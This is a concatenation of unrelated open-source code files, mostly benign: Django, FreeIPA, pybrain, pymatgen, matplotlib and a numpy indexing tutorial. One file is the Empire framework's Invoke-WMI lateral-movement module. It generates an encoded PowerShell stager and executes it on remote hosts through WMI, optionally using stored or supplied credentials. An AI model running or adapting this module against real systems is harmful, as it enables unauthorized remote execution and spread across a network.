output.append("### %s = %s" % (key, user_settings[key]))
return output
def output_unified(self, user_settings, default_settings, **options):
output = []
for key in sorted(user_settings):
if key not in default_settings:
output.append(self.style.SUCCESS("+ %s = %s" % (key, user_settings[key])))
elif user_settings[key] != default_settings[key]:
output.append(self.style.ERROR("- %s = %s" % (key, default_settings[key])))
output.append(self.style.SUCCESS("+ %s = %s" % (key, user_settings[key])))
elif options['all']:
output.append(" %s = %s" % (key, user_settings[key]))
return output
| bsd-3-clause |
sebalix/OpenUpgrade | openerp/openupgrade/openupgrade.py | 8 | 1443 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# This module copyright (C) 2011-2013 Therp BV (<http://therp.nl>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import warnings
_short_name = __name__.split(".")[-1]
warnings.warn(
"Importing %(full_name)s is deprecated. "
"Use from openupgradelib import %(short_name)s" % {
'full_name': __name__,
'short_name': _short_name,
}, DeprecationWarning, stacklevel=2)
_new_name = "openupgradelib.%s" % _short_name
_modules = __import__(_new_name, globals(), locals(), ['*'])
for _i in dir(_modules):
locals()[_i] = getattr(_modules, _i)
| agpl-3.0 |
msimacek/freeipa | ipaserver/install/upgradeinstance.py | 2 | 11257 | # Authors: Rob Crittenden <rcritten@redhat.com>
#
# Copyright (C) 2010 Red Hat
# see file 'COPYING' for use and warranty information
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import ldif
import os
import sys
import shutil
import random
import traceback
from ipaplatform.paths import paths
from ipaplatform import services
from ipapython.ipa_log_manager import *
from ipapython import ipaldap
from ipaserver.install import installutils
from ipaserver.install import schemaupdate
from ipaserver.install import ldapupdate
from ipaserver.install import service
DSE = 'dse.ldif'
class GetEntryFromLDIF(ldif.LDIFParser):
"""
LDIF parser.
To get results, method parse() must be called first, then method
get_results() which return parsed entries
"""
def __init__(self, input_file, entries_dn=[]):
"""
Parse LDIF file.
:param input_file: an LDIF file to be parsed
:param entries_dn: list of DN which will be returned. All entries are
returned if list is empty.
"""
ldif.LDIFParser.__init__(self, input_file)
self.entries_dn = entries_dn
self.results = {}
def get_results(self):
"""
Returns results in dictionary {DN: entry, ...}
"""
return self.results
def handle(self, dn, entry):
if self.entries_dn and dn not in self.entries_dn:
return
self.results[dn] = entry
class ModifyLDIF(ldif.LDIFParser):
"""
Allows to modify LDIF file.
Remove operations are executed before add operations
"""
def __init__(self, input_file, writer):
"""
:param input_file: an LDIF
:param writer: ldif.LDIFWriter instance where modified LDIF will
be written
"""
ldif.LDIFParser.__init__(self, input_file)
self.writer = writer
self.add_dict = {}
self.remove_dict = {}
def add_value(self, dn, attr, value):
"""
Add value to LDIF.
:param dn: DN of entry (must exists)
:param attr: attribute name
:param value: value to be added
"""
attr = attr.lower()
entry = self.add_dict.setdefault(dn, {})
attribute = entry.setdefault(attr, [])
if value not in attribute:
attribute.append(value)
def remove_value(self, dn, attr, value=None):
"""
Remove value from LDIF.
:param dn: DN of entry
:param attr: attribute name
:param value: value to be removed, if value is None, attribute will
be removed
"""
attr = attr.lower()
entry = self.remove_dict.setdefault(dn, {})
if entry is None:
return
attribute = entry.setdefault(attr, [])
if value is None:
# remove all values
entry[attr] = None
return
elif attribute is None:
# already marked to remove all values
return
if value not in attribute:
attribute.append(value)
def handle(self, dn, entry):
if dn in self.remove_dict:
for name, value in self.remove_dict[dn].items():
if value is None:
attribute = []
else:
attribute = entry.setdefault(name, [])
attribute = [v for v in attribute if v not in value]
entry[name] = attribute
if not attribute: # empty
del entry[name]
if dn in self.add_dict:
for name, value in self.add_dict[dn].items():
attribute = entry.setdefault(name, [])
attribute.extend([v for v in value if v not in attribute])
if not entry: # empty
return
self.writer.unparse(dn, entry)
class IPAUpgrade(service.Service):
"""
Update the LDAP data in an instance by turning off all network
listeners and updating over ldapi. This way we know the server is
quiet.
"""
def __init__(self, realm_name, files=[], schema_files=[]):
"""
realm_name: kerberos realm name, used to determine DS instance dir
files: list of update files to process. If none use UPDATEDIR
"""
ext = ''
rand = random.Random()
for i in range(8):
h = "%02x" % rand.randint(0,255)
ext += h
service.Service.__init__(self, "dirsrv")
serverid = installutils.realm_to_serverid(realm_name)
self.filename = '%s/%s' % (paths.ETC_DIRSRV_SLAPD_INSTANCE_TEMPLATE % serverid, DSE)
self.savefilename = '%s/%s.ipa.%s' % (paths.ETC_DIRSRV_SLAPD_INSTANCE_TEMPLATE % serverid, DSE, ext)
self.files = files
self.modified = False
self.serverid = serverid
self.schema_files = schema_files
self.realm = realm_name
def __start(self):
services.service(self.service_name).start(self.serverid, ldapi=True)
def __stop_instance(self):
"""Stop only the main DS instance"""
super(IPAUpgrade, self).stop(self.serverid)
def create_instance(self):
ds_running = super(IPAUpgrade, self).is_running()
if ds_running:
self.step("stopping directory server", self.__stop_instance)
self.step("saving configuration", self.__save_config)
self.step("disabling listeners", self.__disable_listeners)
self.step("enabling DS global lock", self.__enable_ds_global_write_lock)
self.step("starting directory server", self.__start)
if self.schema_files:
self.step("updating schema", self.__update_schema)
self.step("upgrading server", self.__upgrade)
self.step("stopping directory server", self.__stop_instance,
run_after_failure=True)
self.step("restoring configuration", self.__restore_config,
run_after_failure=True)
if ds_running:
self.step("starting directory server", self.start)
self.start_creation(start_message="Upgrading IPA:",
show_service_name=False)
def __save_config(self):
shutil.copy2(self.filename, self.savefilename)
with open(self.filename, "rb") as in_file:
parser = GetEntryFromLDIF(in_file, entries_dn=["cn=config"])
parser.parse()
try:
config_entry = parser.get_results()["cn=config"]
except KeyError:
raise RuntimeError("Unable to find cn=config entry in %s" %
self.filename)
try:
port = config_entry['nsslapd-port'][0]
except KeyError:
pass
else:
self.backup_state('nsslapd-port', port)
try:
security = config_entry['nsslapd-security'][0]
except KeyError:
pass
else:
self.backup_state('nsslapd-security', security)
try:
global_lock = config_entry['nsslapd-global-backend-lock'][0]
except KeyError:
pass
else:
self.backup_state('nsslapd-global-backend-lock', global_lock)
def __enable_ds_global_write_lock(self):
ldif_outfile = "%s.modified.out" % self.filename
with open(ldif_outfile, "wb") as out_file:
ldif_writer = ldif.LDIFWriter(out_file)
with open(self.filename, "rb") as in_file:
parser = ModifyLDIF(in_file, ldif_writer)
parser.remove_value("cn=config", "nsslapd-global-backend-lock")
parser.add_value("cn=config", "nsslapd-global-backend-lock",
"on")
parser.parse()
shutil.copy2(ldif_outfile, self.filename)
def __restore_config(self):
port = self.restore_state('nsslapd-port')
security = self.restore_state('nsslapd-security')
global_lock = self.restore_state('nsslapd-global-backend-lock')
ldif_outfile = "%s.modified.out" % self.filename
with open(ldif_outfile, "wb") as out_file:
ldif_writer = ldif.LDIFWriter(out_file)
with open(self.filename, "rb") as in_file:
parser = ModifyLDIF(in_file, ldif_writer)
if port is not None:
parser.remove_value("cn=config", "nsslapd-port")
parser.add_value("cn=config", "nsslapd-port", port)
if security is not None:
parser.remove_value("cn=config", "nsslapd-security")
parser.add_value("cn=config", "nsslapd-security", security)
# disable global lock by default
parser.remove_value("cn=config", "nsslapd-global-backend-lock")
if global_lock is not None:
parser.add_value("cn=config", "nsslapd-global-backend-lock",
global_lock)
parser.parse()
shutil.copy2(ldif_outfile, self.filename)
def __disable_listeners(self):
ldif_outfile = "%s.modified.out" % self.filename
with open(ldif_outfile, "wb") as out_file:
ldif_writer = ldif.LDIFWriter(out_file)
with open(self.filename, "rb") as in_file:
parser = ModifyLDIF(in_file, ldif_writer)
parser.remove_value("cn=config", "nsslapd-port")
parser.add_value("cn=config", "nsslapd-port", "0")
parser.remove_value("cn=config", "nsslapd-security")
parser.add_value("cn=config", "nsslapd-security", "off")
parser.remove_value("cn=config", "nsslapd-ldapientrysearchbase")
parser.parse()
shutil.copy2(ldif_outfile, self.filename)
def __update_schema(self):
self.modified = schemaupdate.update_schema(
self.schema_files,
dm_password='', ldapi=True) or self.modified
def __upgrade(self):
try:
ld = ldapupdate.LDAPUpdate(dm_password='', ldapi=True)
if len(self.files) == 0:
self.files = ld.get_all_files(ldapupdate.UPDATES_DIR)
self.modified = (ld.update(self.files) or self.modified)
except ldapupdate.BadSyntax as e:
root_logger.error('Bad syntax in upgrade %s', e)
raise
except Exception as e:
# Bad things happened, return gracefully
root_logger.error('Upgrade failed with %s', e)
root_logger.debug('%s', traceback.format_exc())
raise RuntimeError(e)
| gpl-3.0 |
dburr/SchoolIdolAPI | api/migrations/0133_auto_20160621_2124.py | 3 | 1140 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.db.models.deletion
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
('api', '0132_auto_20160607_1748'),
]
operations = [
migrations.AlterField(
model_name='event',
name='japanese_name',
field=models.CharField(unique=True, max_length=100, db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='moderationreport',
name='fake_activity',
field=models.ForeignKey(related_name='moderationreport', on_delete=django.db.models.deletion.SET_NULL, to='api.Activity', null=True),
preserve_default=True,
),
migrations.AlterField(
model_name='moderationreport',
name='fake_user',
field=models.ForeignKey(related_name='moderationreport', on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, null=True),
preserve_default=True,
),
]
| apache-2.0 |
taylorhxu/pybrain | examples/rl/environments/shipsteer/shipbench_sde.py | 26 | 3454 | from __future__ import print_function
#!/usr/bin/env python
#########################################################################
# Reinforcement Learning with SPE on the ShipSteering Environment
#
# Requirements:
# pybrain (tested on rev. 1195, ship env rev. 1202)
# Synopsis:
# shipbenchm.py [<True|False> [logfile]]
# (first argument is graphics flag)
#########################################################################
__author__ = "Martin Felder, Thomas Rueckstiess"
__version__ = '$Id$'
#---
# default backend GtkAgg does not plot properly on Ubuntu 8.04
import matplotlib
matplotlib.use('TkAgg')
#---
from pybrain.rl.environments.shipsteer import ShipSteeringEnvironment
from pybrain.rl.environments.shipsteer import GoNorthwardTask
from pybrain.rl.agents import LearningAgent
from pybrain.rl.learners.directsearch.enac import ENAC
from pybrain.rl.experiments.episodic import EpisodicExperiment
from pybrain.tools.shortcuts import buildNetwork
from pybrain.tools.plotting import MultilinePlotter
from pylab import figure, ion
from scipy import mean
import sys
if len(sys.argv) > 1:
useGraphics = eval(sys.argv[1])
else:
useGraphics = False
# create task
env=ShipSteeringEnvironment()
maxsteps = 500
task = GoNorthwardTask(env=env, maxsteps = maxsteps)
# task.env.setRenderer( CartPoleRenderer())
# create controller network
#net = buildNetwork(task.outdim, 7, task.indim, bias=True, outputbias=False)
net = buildNetwork(task.outdim, task.indim, bias=False)
#net.initParams(0.0)
# create agent
learner = ENAC()
learner.gd.rprop = True
# only relevant for RP
learner.gd.deltamin = 0.0001
#agent.learner.gd.deltanull = 0.05
# only relevant for BP
learner.gd.alpha = 0.01
learner.gd.momentum = 0.9
agent = LearningAgent(net, learner)
agent.actaspg = False
# create experiment
experiment = EpisodicExperiment(task, agent)
# print weights at beginning
print(agent.module.params)
rewards = []
if useGraphics:
figure()
ion()
pl = MultilinePlotter(autoscale=1.2, xlim=[0, 50], ylim=[0, 1])
pl.setLineStyle(linewidth=2)
# queued version
# experiment._fillQueue(30)
# while True:
# experiment._stepQueueLoop()
# # rewards.append(mean(agent.history.getSumOverSequences('reward')))
# print agent.module.getParameters(),
# print mean(agent.history.getSumOverSequences('reward'))
# clf()
# plot(rewards)
# episodic version
x = 0
batch = 30 #number of samples per gradient estimate (was: 20; more here due to stochastic setting)
while x<5000:
#while True:
experiment.doEpisodes(batch)
x += batch
reward = mean(agent.history.getSumOverSequences('reward'))*task.rewardscale
if useGraphics:
pl.addData(0,x,reward)
print(agent.module.params)
print(reward)
#if reward > 3:
# pass
agent.learn()
agent.reset()
if useGraphics:
pl.update()
if len(sys.argv) > 2:
agent.history.saveToFile(sys.argv[1], protocol=-1, arraysonly=True)
if useGraphics:
pl.show( popup = True)
#To view what the simulation is doing at the moment set the environment with True, go to pybrain/rl/environments/ode/ and start viewer.py (python-openGL musst be installed, see PyBrain documentation)
## performance:
## experiment.doEpisodes(5) * 100 without weave:
## real 2m39.683s
## user 2m33.358s
## sys 0m5.960s
## experiment.doEpisodes(5) * 100 with weave:
##real 2m41.275s
##user 2m35.310s
##sys 0m5.192s
##
| bsd-3-clause |
dongsenfo/pymatgen | pymatgen/core/tests/test_xcfunc.py | 3 | 2615 | # coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
from pymatgen.util.testing import PymatgenTest
from pymatgen.core.xcfunc import XcFunc
class LibxcFuncTest(PymatgenTest):
def test_xcfunc_api(self):
"""Testing XcFunc API."""
# Aliases should be unique
assert len(XcFunc.aliases()) == len(set(XcFunc.aliases()))
# LDA-Teter
ixc_1 = XcFunc.from_abinit_ixc(1)
print(ixc_1)
assert ixc_1.type == "LDA"
assert ixc_1.name == "LDA_XC_TETER93"
assert ixc_1 == ixc_1
assert ixc_1 == "LDA_XC_TETER93"
assert ixc_1 != "PBE"
assert ixc_1.name not in XcFunc.aliases()
assert ixc_1 == XcFunc.from_name(ixc_1.name)
# LDA-PW (in aliases)
ixc_7 = XcFunc.from_abinit_ixc(7)
assert ixc_7.type == "LDA"
assert ixc_7.name == "PW"
assert ixc_7.name in XcFunc.aliases()
assert ixc_7.name == XcFunc.from_name(ixc_7.name)
assert ixc_7 != ixc_1
# GGA-PBE from ixc == 11 (in aliases)
ixc_11 = XcFunc.from_abinit_ixc(11)
assert ixc_11.type == "GGA" and ixc_11.name == "PBE"
assert ixc_11.name in XcFunc.aliases()
assert ixc_1 != ixc_11
# Test asxc
assert XcFunc.asxc(ixc_11) is ixc_11
assert XcFunc.asxc("PBE") == ixc_11
d = {ixc_11: ixc_11.name}
print(d)
assert "PBE" in d
assert ixc_11 in d
# Test if object can be serialized with Pickle.
self.serialize_with_pickle(ixc_11, test_eq=True)
# Test if object supports MSONable
# TODO
#print("in test", type(ixc_11.x), type(ixc_11.c), type(ixc_11.xc))
#ixc_11.x.as_dict()
#self.assertMSONable(ixc_11)
# GGA-PBE from ixc given in abinit-libxc mode
ixc_101130 = XcFunc.from_abinit_ixc(-101130)
assert ixc_101130.type == "GGA" and ixc_101130.name == "PBE"
assert ixc_101130 == ixc_11
# GGA-PBE built from name
gga_pbe = XcFunc.from_name("PBE")
assert gga_pbe.type == "GGA" and gga_pbe.name == "PBE"
assert ixc_11 == gga_pbe
# Use X from GGA and C from LDA!
unknown_xc = XcFunc.from_name("GGA_X_PBE+ LDA_C_PW")
assert unknown_xc not in XcFunc.aliases()
assert unknown_xc.type == "GGA+LDA"
assert unknown_xc.name == "GGA_X_PBE+LDA_C_PW"
gga_pbe = XcFunc.from_type_name("GGA", "GGA_X_PBE+GGA_C_PBE")
assert gga_pbe.type == "GGA" and gga_pbe.name == "PBE"
assert str(gga_pbe) == "PBE"
| mit |
cactusbin/nyt | matplotlib/lib/mpl_toolkits/axes_grid1/inset_locator.py | 6 | 9604 | from matplotlib.offsetbox import AnchoredOffsetbox
#from matplotlib.transforms import IdentityTransform
import matplotlib.transforms as mtrans
#from matplotlib.axes import Axes
from mpl_axes import Axes
from matplotlib.transforms import Bbox, TransformedBbox, IdentityTransform
from matplotlib.patches import Patch
from matplotlib.path import Path
from matplotlib.patches import Rectangle
class InsetPosition(object):
def __init__(self, parent, lbwh):
self.parent = parent
self.lbwh = lbwh # position of the inset axes in the normalized coordinate of the parent axes
def __call__(self, ax, renderer):
bbox_parent = self.parent.get_position(original=False)
trans = mtrans.BboxTransformTo(bbox_parent)
bbox_inset = mtrans.Bbox.from_bounds(*self.lbwh)
bb = mtrans.TransformedBbox(bbox_inset, trans)
return bb
class AnchoredLocatorBase(AnchoredOffsetbox):
def __init__(self, bbox_to_anchor, offsetbox, loc,
borderpad=0.5, bbox_transform=None):
super(AnchoredLocatorBase, self).__init__(loc,
pad=0., child=None,
borderpad=borderpad,
bbox_to_anchor=bbox_to_anchor,
bbox_transform=bbox_transform)
def draw(self, renderer):
raise RuntimeError("No draw method should be called")
def __call__(self, ax, renderer):
fontsize = renderer.points_to_pixels(self.prop.get_size_in_points())
self._update_offset_func(renderer, fontsize)
width, height, xdescent, ydescent = self.get_extent(renderer)
px, py = self.get_offset(width, height, 0, 0, renderer)
bbox_canvas = mtrans.Bbox.from_bounds(px, py, width, height)
tr = ax.figure.transFigure.inverted()
bb = mtrans.TransformedBbox(bbox_canvas, tr)
return bb
import axes_size as Size
class AnchoredSizeLocator(AnchoredLocatorBase):
def __init__(self, bbox_to_anchor, x_size, y_size, loc,
borderpad=0.5, bbox_transform=None):
self.axes = None
self.x_size = Size.from_any(x_size)
self.y_size = Size.from_any(y_size)
super(AnchoredSizeLocator, self).__init__(bbox_to_anchor, None, loc,
borderpad=borderpad,
bbox_transform=bbox_transform)
def get_extent(self, renderer):
x, y, w, h = self.get_bbox_to_anchor().bounds
dpi = renderer.points_to_pixels(72.)
r, a = self.x_size.get_size(renderer)
width = w*r + a*dpi
r, a = self.y_size.get_size(renderer)
height = h*r + a*dpi
xd, yd = 0, 0
fontsize = renderer.points_to_pixels(self.prop.get_size_in_points())
pad = self.pad * fontsize
return width+2*pad, height+2*pad, xd+pad, yd+pad
def __call__(self, ax, renderer):
self.axes = ax
return super(AnchoredSizeLocator, self).__call__(ax, renderer)
class AnchoredZoomLocator(AnchoredLocatorBase):
def __init__(self, parent_axes, zoom, loc,
borderpad=0.5,
bbox_to_anchor=None,
bbox_transform=None):
self.parent_axes = parent_axes
self.zoom = zoom
if bbox_to_anchor is None:
bbox_to_anchor = parent_axes.bbox
super(AnchoredZoomLocator, self).__init__(bbox_to_anchor, None, loc,
borderpad=borderpad,
bbox_transform=bbox_transform)
self.axes = None
def get_extent(self, renderer):
bb = mtrans.TransformedBbox(self.axes.viewLim, self.parent_axes.transData)
x, y, w, h = bb.bounds
xd, yd = 0, 0
fontsize = renderer.points_to_pixels(self.prop.get_size_in_points())
pad = self.pad * fontsize
return w*self.zoom+2*pad, h*self.zoom+2*pad, xd+pad, yd+pad
def __call__(self, ax, renderer):
self.axes = ax
return super(AnchoredZoomLocator, self).__call__(ax, renderer)
class BboxPatch(Patch):
def __init__(self, bbox, **kwargs):
if "transform" in kwargs:
raise ValueError("transform should not be set")
kwargs["transform"] = IdentityTransform()
Patch.__init__(self, **kwargs)
self.bbox = bbox
def get_path(self):
x0, y0, x1, y1 = self.bbox.extents
verts = [(x0, y0),
(x1, y0),
(x1, y1),
(x0, y1),
(x0, y0),
(0,0)]
codes = [Path.MOVETO,
Path.LINETO,
Path.LINETO,
Path.LINETO,
Path.LINETO,
Path.CLOSEPOLY]
return Path(verts, codes)
class BboxConnector(Patch):
@staticmethod
def get_bbox_edge_pos(bbox, loc):
x0, y0, x1, y1 = bbox.extents
if loc==1:
return x1, y1
elif loc==2:
return x0, y1
elif loc==3:
return x0, y0
elif loc==4:
return x1, y0
@staticmethod
def connect_bbox(bbox1, bbox2, loc1, loc2=None):
if isinstance(bbox1, Rectangle):
transform = bbox1.get_transfrom()
bbox1 = Bbox.from_bounds(0, 0, 1, 1)
bbox1 = TransformedBbox(bbox1, transform)
if isinstance(bbox2, Rectangle):
transform = bbox2.get_transform()
bbox2 = Bbox.from_bounds(0, 0, 1, 1)
bbox2 = TransformedBbox(bbox2, transform)
if loc2 is None:
loc2 = loc1
x1, y1 = BboxConnector.get_bbox_edge_pos(bbox1, loc1)
x2, y2 = BboxConnector.get_bbox_edge_pos(bbox2, loc2)
verts = [[x1, y1], [x2,y2]]
#Path()
codes = [Path.MOVETO, Path.LINETO]
return Path(verts, codes)
def __init__(self, bbox1, bbox2, loc1, loc2=None, **kwargs):
"""
*path* is a :class:`matplotlib.path.Path` object.
Valid kwargs are:
%(Patch)s
.. seealso::
:class:`Patch`
For additional kwargs
"""
if "transform" in kwargs:
raise ValueError("transform should not be set")
kwargs["transform"] = IdentityTransform()
Patch.__init__(self, **kwargs)
self.bbox1 = bbox1
self.bbox2 = bbox2
self.loc1 = loc1
self.loc2 = loc2
def get_path(self):
return self.connect_bbox(self.bbox1, self.bbox2,
self.loc1, self.loc2)
class BboxConnectorPatch(BboxConnector):
def __init__(self, bbox1, bbox2, loc1a, loc2a, loc1b, loc2b, **kwargs):
if "transform" in kwargs:
raise ValueError("transform should not be set")
BboxConnector.__init__(self, bbox1, bbox2, loc1a, loc2a, **kwargs)
self.loc1b = loc1b
self.loc2b = loc2b
def get_path(self):
path1 = self.connect_bbox(self.bbox1, self.bbox2, self.loc1, self.loc2)
path2 = self.connect_bbox(self.bbox2, self.bbox1, self.loc2b, self.loc1b)
path_merged = list(path1.vertices) + list (path2.vertices) + [path1.vertices[0]]
return Path(path_merged)
def _add_inset_axes(parent_axes, inset_axes):
parent_axes.figure.add_axes(inset_axes)
inset_axes.set_navigate(False)
def inset_axes(parent_axes, width, height, loc=1,
bbox_to_anchor=None, bbox_transform=None,
axes_class=None,
axes_kwargs=None,
**kwargs):
if axes_class is None:
axes_class = Axes
if axes_kwargs is None:
inset_axes = axes_class(parent_axes.figure, parent_axes.get_position())
else:
inset_axes = axes_class(parent_axes.figure, parent_axes.get_position(),
**axes_kwargs)
if bbox_to_anchor is None:
bbox_to_anchor = parent_axes.bbox
axes_locator = AnchoredSizeLocator(bbox_to_anchor,
width, height,
loc=loc,
bbox_transform=bbox_transform,
**kwargs)
inset_axes.set_axes_locator(axes_locator)
_add_inset_axes(parent_axes, inset_axes)
return inset_axes
def zoomed_inset_axes(parent_axes, zoom, loc=1,
bbox_to_anchor=None, bbox_transform=None,
axes_class=None,
axes_kwargs=None,
**kwargs):
if axes_class is None:
axes_class = Axes
if axes_kwargs is None:
inset_axes = axes_class(parent_axes.figure, parent_axes.get_position())
else:
inset_axes = axes_class(parent_axes.figure, parent_axes.get_position(),
**axes_kwargs)
axes_locator = AnchoredZoomLocator(parent_axes, zoom=zoom, loc=loc,
bbox_to_anchor=bbox_to_anchor, bbox_transform=bbox_transform,
**kwargs)
inset_axes.set_axes_locator(axes_locator)
_add_inset_axes(parent_axes, inset_axes)
return inset_axes
def mark_inset(parent_axes, inset_axes, loc1, loc2, **kwargs):
rect = TransformedBbox(inset_axes.viewLim, parent_axes.transData)
pp = BboxPatch(rect, **kwargs)
parent_axes.add_patch(pp)
p1 = BboxConnector(inset_axes.bbox, rect, loc1=loc1, **kwargs)
inset_axes.add_patch(p1)
p1.set_clip_on(False)
p2 = BboxConnector(inset_axes.bbox, rect, loc1=loc2, **kwargs)
inset_axes.add_patch(p2)
p2.set_clip_on(False)
return pp, p1, p2
| unlicense |
zhuyue1314/Empire | lib/modules/lateral_movement/invoke_wmi.py | 22 | 5567 | from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-WMI',
'Author': ['@harmj0y'],
'Description': ('Executes a stager on remote hosts using WMI.'),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'MinPSVersion' : '2',
'Comments': []
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'CredID' : {
'Description' : 'CredID from the store to use.',
'Required' : False,
'Value' : ''
},
'ComputerName' : {
'Description' : 'Host[s] to execute the stager on, comma separated.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'UserName' : {
'Description' : '[domain\]username to use to execute command.',
'Required' : False,
'Value' : ''
},
'Password' : {
'Description' : 'Password to use to execute command.',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
userName = self.options['UserName']['Value']
password = self.options['Password']['Value']
script = """$null = Invoke-WmiMethod -Path Win32_process -Name create"""
# if a credential ID is specified, try to parse
credID = self.options["CredID"]['Value']
if credID != "":
if not self.mainMenu.credentials.is_credential_valid(credID):
print helpers.color("[!] CredID is invalid!")
return ""
(credID, credType, domainName, userName, password, host, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0]
if domainName != "":
self.options["UserName"]['Value'] = str(domainName) + "\\" + str(userName)
else:
self.options["UserName"]['Value'] = str(userName)
if password != "":
self.options["Password"]['Value'] = password
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
if launcher == "":
return ""
else:
stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
# build the WMI execution string
computerNames = "\"" + "\",\"".join(self.options['ComputerName']['Value'].split(",")) + "\""
script += " -ComputerName @("+computerNames+")"
script += " -ArgumentList \"" + stagerCode + "\""
# if we're supplying alternate user credentials
if userName != '':
script = "$PSPassword = \""+password+"\" | ConvertTo-SecureString -asPlainText -Force;$Credential = New-Object System.Management.Automation.PSCredential(\""+userName+"\",$PSPassword);" + script + " -Credential $Credential"
script += ";'Invoke-Wmi executed on " +computerNames +"'"
return script
| bsd-3-clause |
mariosky/evo-drawings | venv/lib/python2.7/site-packages/numpy/doc/indexing.py | 52 | 15441 | """
==============
Array indexing
==============
Array indexing refers to any use of the square brackets ([]) to index
array values. There are many options to indexing, which give numpy
indexing great power, but with power comes some complexity and the
potential for confusion. This section is just an overview of the
various options and issues related to indexing. Aside from single
element indexing, the details on most of these options are to be
found in related sections.
Assignment vs referencing
=========================
Most of the following examples show the use of indexing when
referencing data in an array. The examples work just as well
when assigning to an array. See the section at the end for
specific examples and explanations on how assignments work.
Single element indexing
=======================
Single element indexing for a 1-D array is what one expects. It work
exactly like that for other standard Python sequences. It is 0-based,
and accepts negative indices for indexing from the end of the array. ::
>>> x = np.arange(10)
>>> x[2]
2
>>> x[-2]
8
Unlike lists and tuples, numpy arrays support multidimensional indexing
for multidimensional arrays. That means that it is not necessary to
separate each dimension's index into its own set of square brackets. ::
>>> x.shape = (2,5) # now x is 2-dimensional
>>> x[1,3]
8
>>> x[1,-1]
9
Note that if one indexes a multidimensional array with fewer indices
than dimensions, one gets a subdimensional array. For example: ::
>>> x[0]
array([0, 1, 2, 3, 4])
That is, each index specified selects the array corresponding to the
rest of the dimensions selected. In the above example, choosing 0
means that remaining dimension of lenth 5 is being left unspecified,
and that what is returned is an array of that dimensionality and size.
It must be noted that the returned array is not a copy of the original,
but points to the same values in memory as does the original array.
In this case, the 1-D array at the first position (0) is returned.
So using a single index on the returned array, results in a single
element being returned. That is: ::
>>> x[0][2]
2
So note that ``x[0,2] = x[0][2]`` though the second case is more
inefficient a new temporary array is created after the first index
that is subsequently indexed by 2.
Note to those used to IDL or Fortran memory order as it relates to
indexing. Numpy uses C-order indexing. That means that the last
index usually represents the most rapidly changing memory location,
unlike Fortran or IDL, where the first index represents the most
rapidly changing location in memory. This difference represents a
great potential for confusion.
Other indexing options
======================
It is possible to slice and stride arrays to extract arrays of the
same number of dimensions, but of different sizes than the original.
The slicing and striding works exactly the same way it does for lists
and tuples except that they can be applied to multiple dimensions as
well. A few examples illustrates best: ::
>>> x = np.arange(10)
>>> x[2:5]
array([2, 3, 4])
>>> x[:-7]
array([0, 1, 2])
>>> x[1:7:2]
array([1, 3, 5])
>>> y = np.arange(35).reshape(5,7)
>>> y[1:5:2,::3]
array([[ 7, 10, 13],
[21, 24, 27]])
Note that slices of arrays do not copy the internal array data but
also produce new views of the original data.
It is possible to index arrays with other arrays for the purposes of
selecting lists of values out of arrays into new arrays. There are
two different ways of accomplishing this. One uses one or more arrays
of index values. The other involves giving a boolean array of the proper
shape to indicate the values to be selected. Index arrays are a very
powerful tool that allow one to avoid looping over individual elements in
arrays and thus greatly improve performance.
It is possible to use special features to effectively increase the
number of dimensions in an array through indexing so the resulting
array aquires the shape needed for use in an expression or with a
specific function.
Index arrays
============
Numpy arrays may be indexed with other arrays (or any other sequence-
like object that can be converted to an array, such as lists, with the
exception of tuples; see the end of this document for why this is). The
use of index arrays ranges from simple, straightforward cases to
complex, hard-to-understand cases. For all cases of index arrays, what
is returned is a copy of the original data, not a view as one gets for
slices.
Index arrays must be of integer type. Each value in the array indicates
which value in the array to use in place of the index. To illustrate: ::
>>> x = np.arange(10,1,-1)
